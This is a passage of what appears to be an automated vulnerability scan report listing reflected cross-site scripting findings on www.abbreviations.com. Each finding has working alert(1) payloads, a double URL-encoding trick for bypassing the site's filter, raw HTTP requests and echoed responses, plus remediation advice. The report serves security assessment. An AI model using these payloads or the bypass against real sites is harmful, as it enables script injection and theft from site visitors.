The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42381%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c044cd5629 was submitted in the REST URL parameter 1. This input was echoed as 42381"><script>alert(1)</script>8c044cd5629 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspx42381%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c044cd5629 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:28 GMT
Connection: close
Content-Length: 27276


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does justadded.aspx42381"><script>alert(1)</script>8c044cd5629 stand for?, What does justadded.aspx42381">
...[SNIP]...

2.38. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db78%2522%253balert%25281%2529%252f%252f54c807c3c7d was submitted in the REST URL parameter 1. This input was echoed as 8db78";alert(1)//54c807c3c7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspx8db78%2522%253balert%25281%2529%252f%252f54c807c3c7d HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:25:05 GMT
Connection: close
Content-Length: 26906


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "justadded.aspx8db78";alert(1)//54c807c3c7d";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "justadded.aspx8db78";alert(1)//54c807c3c7d" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location
...[SNIP]...

2.39. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8287f%253cscript%253ealert%25281%2529%253c%252fscript%253ecc7e34a63cc was submitted in the REST URL parameter 1. This input was echoed as 8287f<script>alert(1)</script>cc7e34a63cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspx8287f%253cscript%253ealert%25281%2529%253c%252fscript%253ecc7e34a63cc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:25 GMT
Connection: close
Content-Length: 27238


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>cc7e34a63cc";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "justadded.aspx8287f<script>alert(1)</script>cc7e34a63cc" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "justadded.aspx8287f<script>
...[SNIP]...

2.40. http://www.abbreviations.com/random.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bde3%253cscript%253ealert%25281%2529%253c%252fscript%253e480139ed9b was submitted in the REST URL parameter 1. This input was echoed as 7bde3<script>alert(1)</script>480139ed9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspx7bde3%253cscript%253ealert%25281%2529%253c%252fscript%253e480139ed9b HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:20 GMT
Connection: close
Content-Length: 27130


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>480139ed9b";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "random.aspx7bde3<script>alert(1)</script>480139ed9b" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "random.aspx7bde3<script>
...[SNIP]...

2.41. http://www.abbreviations.com/random.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload a3e63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e029e9681aa3 was submitted in the REST URL parameter 1. This input was echoed as a3e63</title><script>alert(1)</script>029e9681aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspxa3e63%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e029e9681aa3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:45 GMT
Connection: close
Content-Length: 27357


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does random.aspxa3e63</title><script>alert(1)</script>029e9681aa3 stand for?</title>
...[SNIP]...

2.42. http://www.abbreviations.com/random.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0199%2522%253balert%25281%2529%252f%252fdc2600d1a53 was submitted in the REST URL parameter 1. This input was echoed as d0199";alert(1)//dc2600d1a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspxd0199%2522%253balert%25281%2529%252f%252fdc2600d1a53 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:27:19 GMT
Connection: close
Content-Length: 26825


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "random.aspxd0199";alert(1)//dc2600d1a53";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "random.aspxd0199";alert(1)//dc2600d1a53" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.hr
...[SNIP]...

2.43. http://www.abbreviations.com/random.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6714c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6150d8cc99d was submitted in the REST URL parameter 1. This input was echoed as 6714c"><script>alert(1)</script>6150d8cc99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspx6714c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6150d8cc99d HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:31 GMT
Connection: close
Content-Length: 27195


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does random.aspx6714c"><script>alert(1)</script>6150d8cc99d stand for?, What does random.aspx6714c">
...[SNIP]...

2.44. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81f14%253cscript%253ealert%25281%2529%253c%252fscript%253e1dcba33aba9 was submitted in the REST URL parameter 1. This input was echoed as 81f14<script>alert(1)</script>1dcba33aba9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspx81f14%253cscript%253ealert%25281%2529%253c%252fscript%253e1dcba33aba9 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:30:35 GMT
Connection: close
Content-Length: 27304


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>1dcba33aba9";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchAmazon.aspx81f14<script>alert(1)</script>1dcba33aba9" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "searchAmazon.aspx81f14<script>
...[SNIP]...

2.45. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b29%2522%253balert%25281%2529%252f%252f3fbc9a897bd was submitted in the REST URL parameter 1. This input was echoed as c8b29";alert(1)//3fbc9a897bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspxc8b29%2522%253balert%25281%2529%252f%252f3fbc9a897bd HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:07 GMT
Connection: close
Content-Length: 26968


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "searchAmazon.aspxc8b29";alert(1)//3fbc9a897bd";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "searchAmazon.aspxc8b29";alert(1)//3fbc9a897bd" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.locat
...[SNIP]...

2.46. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de701%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9e42a89191 was submitted in the REST URL parameter 1. This input was echoed as de701"><script>alert(1)</script>e9e42a89191 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspxde701%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9e42a89191 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:43 GMT
Connection: close
Content-Length: 27373


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does searchAmazon.aspxde701"><script>alert(1)</script>e9e42a89191 stand for?, What does searchAmazon.aspxde701">
...[SNIP]...

2.47. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 12886%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65482f9cb43 was submitted in the REST URL parameter 1. This input was echoed as 12886</title><script>alert(1)</script>65482f9cb43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /searchAmazon.aspx12886%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e65482f9cb43 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:32:50 GMT
Connection: close
Content-Length: 27554


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does searchAmazon.aspx12886</title><script>alert(1)</script>65482f9cb43 stand for?</title>
...[SNIP]...

2.48. http://www.abbreviations.com/searchAmazon.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 16b98</title><script>alert(1)</script>ea6b04fea67 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=16b98</title><script>alert(1)</script>ea6b04fea67 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:18 GMT
Connection: close
Content-Length: 27523

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<title>What does 16b98</title><script>alert(1)</script>ea6b04fea67 stand for?</title>
...[SNIP]...

2.49. http://www.abbreviations.com/searchAmazon.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 9c244<script>alert(1)</script>f6f6f282acc was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchAmazon.aspx?st=9c244<script>alert(1)</script>f6f6f282acc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:16 GMT
Connection: close
Content-Length: 27371

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

.resp {padding:0px;
...[SNIP]...
<span style="color:#000055;font-weight:bold;font-style:italic;">9c244<script>alert(1)</script>f6f6f282acc</span>
...[SNIP]...

2.50. http://www.abbreviations.com/searchAmazon.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /searchAmazon.aspx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e03"%3balert(1)//fb56f9bdb1a was submitted in the st parameter. This input was echoed as 55e03";alert(1)//fb56f9bdb1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchAmazon.aspx?st=55e03"%3balert(1)//fb56f9bdb1a HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:22:56 GMT
Connection: close
Content-Length: 27124

<html>

<head>
<title>Amazon Search Results</title>
<style><!--
.ctgp {padding:0px 10px 0px 0px;}
.ctgp a, .ctgp a:visited {color:#000000;}
.ctgp a:hover {color:#990000;}

